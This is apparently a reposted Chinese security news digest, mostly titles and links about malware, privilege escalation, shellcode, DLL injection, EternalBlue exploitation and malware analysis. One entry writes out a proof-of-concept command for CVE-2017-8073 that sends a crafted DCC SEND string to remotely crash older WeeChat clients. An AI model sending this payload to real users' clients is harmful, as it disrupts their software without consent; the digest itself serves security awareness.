每日关注之安全资讯第5期

释放双眼,带上耳机,听听看~!

点击阅读原文可点击链接

Apple撤销OSX / Dok恶意软件使用的证书

https://threatpost.com/apple-revokes-certificate-used-by-osxdok-malware/125322/ 

 

WordPress Core -RCE PoC Exploit (video) 无需插件和认证

https://youtu.be/ZFt_S5pQPX0 

 

比较“81端口的botnet”和 MIRAI 之间的联系

http://blog.netlab.360.com/the_difference_between_http81_botnet_and_mirai/ 

 

内网安全——利用NSA Smbtouch批量检测内网

https://3gstudent.github.io/3gstudent.github.io/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%88%A9%E7%94%A8NSA-Smbtouch%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B%E5%86%85%E7%BD%91/

 

Linux 4.X Tracing Tools: Using BPF Superpowers 

http://www.brendangregg.com/blog/2017-04-29/usenix-lisa-2016-bcc-bpf-tools.html 

 

Windows提权思路总结

http://blog.mokirin.com/2017/04/27/windows%E6%8F%90%E6%9D%83%E6%80%9D%E8%B7%AF%E6%80%BB%E7%BB%93/ 

 

绕过ios锁屏漏洞的总结

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html

 

编写高质量的Windows Shellcode

https://dimitrifourny.github.io/2017/04/28/optimized-windows-shellcode/ 

 

CVE-2017-8073 POC :WeeChat 1.7.1之前远程crash

/exec -o /bin/echo -e “\x01DCC SEND \” 1.2.3.4 1337 1\x01

 

十五种方式打破RSA的安全性

https://github.com/comaeio/OPCDE/blob/master/15_ways_to_break_RSA_Security/opcde2017-ds-lifchitz-break_rsa.pdf 

 

利用.NET管理DCOM对象模型

https://googleprojectzero.blogspot.in/2017/04/exploiting-net-managed-dcom.html 

 

在C中使用LoadLibrary进行DLL注入

https://arvanaghi.com/blog/dll-injection-using-loadlibrary-in-C/ 

 

恶意样本分析手册——工具篇

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-1/ 

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-2/ 

 

HookCase是一个用于在MacOS上进行调试和逆向工程应用的工具

https://github.com/steven-michaud/HookCase 

 

在Metasploit中远程利用Eternalblue和Dualpulsar Exploit

http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/ 

 

揭秘薅羊毛过亿的苹果36技术黑产

http://www.freebuf.com/articles/others-articles/133311.html 

 

从hash传递攻击谈相关Windows安全机制

http://bobao.360.cn/learning/detail/3793.html 

 

利用FRIDA攻击Android应用程序

http://bobao.360.cn/learning/detail/3794.html 

 


本文源自微信公众号:黑鸟

人已赞赏
安全工具

【漏洞预警+数据泄露】Microsoft Word RCE(CVE-2019-0585) +其他漏洞和情报资讯

2019-10-16 10:45:23

安全工具

一个来自伊朗官方的监视行动:Domestic Kitten,样本特征明显

2019-10-16 10:45:31

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索